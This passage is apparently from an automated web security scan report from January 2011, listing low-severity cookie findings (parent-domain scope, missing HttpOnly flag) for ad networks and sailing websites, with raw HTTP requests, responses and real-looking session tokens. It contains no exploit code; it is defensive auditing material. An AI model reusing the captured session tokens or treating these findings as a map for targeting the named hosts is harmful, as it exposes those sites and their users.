Cookie: acb113196=5_[r^kI/7ZrO@Pn0nf8MvlYT!?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP8LS2pGwuOcdBWHfHSmrEEK_fzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA4AUBAgUCAAUAAAAAsiOTEgAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482815%29%3Buf%28%27r%27%2C+151608%2C+1295482815%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2811%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2887%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28619%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28620%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28621%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; 
acb303093=5_[r^XI()vrO@Pn0nf8MwM9g$?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviP9CL-hxz-rYyBWHfHSmrEELBfzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAAeggBAgUCAAUAAAAALyC12AAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482817%29%3Buf%28%27r%27%2C+151609%2C+1295482817%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2811%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2887%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28619%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28620%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28621%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)hgVCgQw>7'NF7uNVkG0XN^BPJ.^ZXwcsDU[n.KmyD0IP?EJtun(LG%y$qg]mwnXkD%rDs0:0$Ob('INuCClbQ^7w=g32LzAgGCPGs/^Zf3+TaP

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:30:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:30:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb113196=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb303093=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:30:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb88891=5_[r^XI()vrO@Pn0nf8M?mCw(?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviPw-KkW6pUP1vBWHfHSmrEEIXgjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAAigQBAgUCAAUAAAAAyx6YZAAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295483415%29%3Buf%28%27r%27%2C+151609%2C+1295483415%29%3Bppv%2882%2C+%278069694795952523791%27%2C+1295483415%2C+1305851415%2C+2132%2C+23869%29%3Bppv%2884%2C+%278069694795952523791%27%2C+1295483415%2C+1305851415%2C+2132%2C+23869%29%3Bppv%2811%2C+%278069694795952523791%27%2C+1295483415%2C+1305851415%2C+2132%2C+23869%29%3Bppv%2882%2C+%278069694795952523791%27%2C+1295483415%2C+1305851415%2C+2132%2C+23869%29%3Bppv%2884%2C+%278069694795952523791%27%2C+1295483415%2C+1305851415%2C+2132%2C+23869%29%3Bppv%2887%2C+%278069694795952523791%27%2C+1295483415%2C+1295569815%2C+2132%2C+23869%29%3Bppv%28619%2C+%278069694795952523791%27%2C+1295483415%2C+1295569815%2C+2132%2C+23869%29%3Bppv%28620%2C+%278069694795952523791%27%2C+1295483415%2C+1295569815%2C+2132%2C+23869%29%3Bppv%28621%2C+%278069694795952523791%27%2C+1295483415%2C+1295569815%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:30:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:30:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)'qHqWd-AGmScENVx-p:Y9b66ZCJLN[8yvY$hcwDwhp^RbpUUZcwln=gw`]wKC0A)'9Dj6XfCjr1`pXWX!Zug7w[D'0P+4t(R':*^j@d'/O'8DQO*(j)bjW#>; path=/; expires=Wed, 20-Apr-2011 00:30:15 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:30:15 GMT
Content-Length: 504

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-93054228_1295482822,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l
...[SNIP]...

7.26. http://ib.adnxs.com/seg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add_code=impx-11265&member=30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; acb35548=5_[r^kI/7ZrO@Pn0nf8M8cp]i?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP1729trACfBsBWHfHSmrEEIEfjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA6AgBAgUCAAUAAAAA3yJj0gAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482372%29%3Buf%28%27r%27%2C+151608%2C+1295482372%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2811%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2887%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28619%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28620%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28621%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBpbb)jKuoIgTwzHPZ2[uGVGi2$WVP]vE7ilpu2(MPy%SF(w77BERA(EO4I(3<csJ3xssMeZG!7<'>q5Yjf

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:13:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:13:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:13:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG3H<cvjr/?0P(*AuB-u**g1:XIC8]UMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wACGY+1'U74=YF]n@)*InD4_+; path=/; expires=Wed, 20-Apr-2011 00:13:37 GMT; domain=.adnxs.com; HttpOnly
Location: http://r.openx.net/set?pid=408c9df8-85fe-6893-4938-ccbfd204601e&rtb=4760492999213801733
Date: Thu, 20 Jan 2011 00:13:37 GMT
Content-Length: 0


7.27. http://www.tuenti.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tuenti.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.tuenti.com
Proxy-Connection: keep-alive
Referer: http://www.tuenti.com/share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ourl=%3Fm%3DShare%26url%3Dhttp%253A%252F%252Fwww.elmundo.es%252Felmundo%252F2011%252F01%252F17%252Fnautica%252F1295254542.html%26p%3D; keep_ru=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ourl=deleted; expires=Wed, 20-Jan-2010 14:11:43 GMT; path=/; domain=.tuenti.com
Set-Cookie: manual_logout=deleted; expires=Wed, 20-Jan-2010 14:11:43 GMT; path=/; domain=.tuenti.com
X-Tuenti-State: logout
Vary: Accept-Encoding
Connection: close
Date: Thu, 20 Jan 2011 14:11:44 GMT
Content-Length: 1630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta http-equiv="
...[SNIP]...

7.28. http://www.tuenti.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tuenti.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?m=login HTTP/1.1
Host: www.tuenti.com
Proxy-Connection: keep-alive
Referer: http://www.tuenti.com/?gotHash=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: keep_ru=1; ourl=%3F

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Set-Cookie: ond=deleted; expires=Wed, 20-Jan-2010 14:11:44 GMT; path=/; domain=.tuenti.com
Set-Cookie: ue=deleted; expires=Wed, 20-Jan-2010 14:11:44 GMT; path=/; domain=.tuenti.com
Set-Cookie: manual_logout=deleted; expires=Wed, 20-Jan-2010 14:11:44 GMT; path=/; domain=.tuenti.com
Set-Cookie: ond=deleted; expires=Wed, 20-Jan-2010 14:11:44 GMT; path=/; domain=.tuenti.com
Set-Cookie: ue=deleted; expires=Wed, 20-Jan-2010 14:11:44 GMT; path=/; domain=.tuenti.com
Set-Cookie: em=deleted; expires=Wed, 20-Jan-2010 14:11:44 GMT; path=/; domain=.tuenti.com
Set-Cookie: fa=deleted; expires=Wed, 20-Jan-2010 14:11:44 GMT; path=/; domain=.tuenti.com
Set-Cookie: et=deleted; expires=Wed, 20-Jan-2010 14:11:44 GMT; path=/; domain=.tuenti.com
Content-Type: text/html
Vary: Accept-Encoding
Connection: close
Date: Thu, 20 Jan 2011 14:11:45 GMT
Content-Length: 23439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...

7.29. http://www.tuenti.com/share

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tuenti.com
Path:   /share

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ond=deleted; expires=Wed, 20-Jan-2010 00:51:22 GMT; path=/; domain=.tuenti.com
Set-Cookie: ourl=%3Fm%3DShare%26url%3Dhttp%253A%252F%252Fwww.elmundo.es%252Felmundo%252F2011%252F01%252F17%252Fnautica%252F1295254542.html%26p%3D; path=/; domain=.tuenti.com
Set-Cookie: keep_ru=1; path=/; domain=.tuenti.com
Set-Cookie: ue=deleted; expires=Wed, 20-Jan-2010 00:51:22 GMT; path=/; domain=.tuenti.com
Set-Cookie: em=deleted; expires=Wed, 20-Jan-2010 00:51:22 GMT; path=/; domain=.tuenti.com
Set-Cookie: fa=deleted; expires=Wed, 20-Jan-2010 00:51:22 GMT; path=/; domain=.tuenti.com
Set-Cookie: et=deleted; expires=Wed, 20-Jan-2010 00:51:22 GMT; path=/; domain=.tuenti.com
Connection: close
Date: Thu, 20 Jan 2011 00:51:23 GMT
Content-Length: 41802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...

8. Cookie without HttpOnly flag set
There are 30 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie header.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

8.1. http://americascup.mediaaccess.evolix.net/index.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://americascup.mediaaccess.evolix.net
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
Host: americascup.mediaaccess.evolix.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:36:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=f7dd62b0baadb91dcf47f180dfeb400d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 60255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media</
...[SNIP]...

8.2. http://www.americascupmedia.com/index.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.americascupmedia.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: PHPSESSID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:44:48 GMT
Server: Apache
Set-Cookie: PHPSESSID=5df83766a88aa55095427a70359ae9f4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 60255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media</
...[SNIP]...

8.3. http://www.beneteaucountdown.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.beneteaucountdown.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: PHPSESSID, BBF_Login. The PHPSESSID cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.beneteaucountdown.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:45:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=73d01392661731b6ebe83291ff64f389; path=/
Expires:
Cache-Control:
Pragma:
Set-Cookie: BBF_Login=deleted; expires=Wed, 20-Jan-2010 00:45:05 GMT
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 21847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

8.4. http://www.w-w-i.com/velux_5_oceans_2010_race/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.w-w-i.com
Path:   /velux_5_oceans_2010_race/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: THESESSION. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /velux_5_oceans_2010_race/ HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:51:52 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
X-Powered-By: PHP/4.3.10-22
P3P: policyref="http://www.w-w-i.com/w3c/p3p.xml",
Set-Cookie: THESESSION=13c7e006f0c56b998c7eef7ea57f3854; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27382

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>World Wide Images :: Velux 5 Oceans 2010 Race :: Online Press Office</title>
<meta name=
...[SNIP]...

8.5. http://www.yachtscoring.com/event_results_cumulative.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.yachtscoring.com
Path:   /event_results_cumulative.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: CFID, CFTOKEN. The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event_results_cumulative.cfm HTTP/1.1
Host: www.yachtscoring.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 20 Jan 2011 00:54:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6963848;expires=Sat, 12-Jan-2041 00:54:26 GMT;path=/
Set-Cookie: CFTOKEN=98037815;expires=Sat, 12-Jan-2041 00:54:26 GMT;path=/
Set-Cookie: CFID=6963848;path=/
Set-Cookie: CFTOKEN=98037815;path=/
location: ./select_event.cfm?CFID=6963848&CFTOKEN=98037815
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

8.6. http://2822.v.fwmrm.net/ad/g/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2822.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: _sid, _uid, _vr, _sc, _wr. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/g/1?nw=10274&pvrn=Insert%20Random%20Number%20Here&csid=display&resp=ad;;ptgt=s&envp=g_js&slid=Rectangle&w=300&h=250 HTTP/1.1
Host: 2822.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://blip.tv/file/4639878
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="a104_5562153497824379009"; _vr="1295039779..246255~312652~,"; _cph="1295039779.438.1.1,"; _sc="sg122034.1295039779.1295039779.28800.0.0,"; _wr="g122034"

Response

HTTP/1.1 200 OK
Set-Cookie: _sid="c115_5564057886323802955";domain=.fwmrm.net;path=/;
Set-Cookie: _uid="a104_5562153497824379009";expires=Fri, 20 Jan 2012 00:26:19 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1295483178..60536~60671~66149~103579~170504~173095~306401~,";expires=Sat, 19 Feb 2011 00:26:19 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg23001.1295483179.1295483179.28800.0.0,";expires=Sat, 19 Feb 2011 00:26:19 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g23001";expires=Sat, 19 Feb 2011 00:26:19 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
X-FW-Power-By: Dot
Content-Type: text/javascript
Cteonnt-Length: 126
Pragma: no-cache
Date: Thu, 20 Jan 2011 00:26:19 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Set-Cookie: NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3c45525d5f4f58455e445a4a423209;path=/;httponly
Content-Length: 126

document.write("<span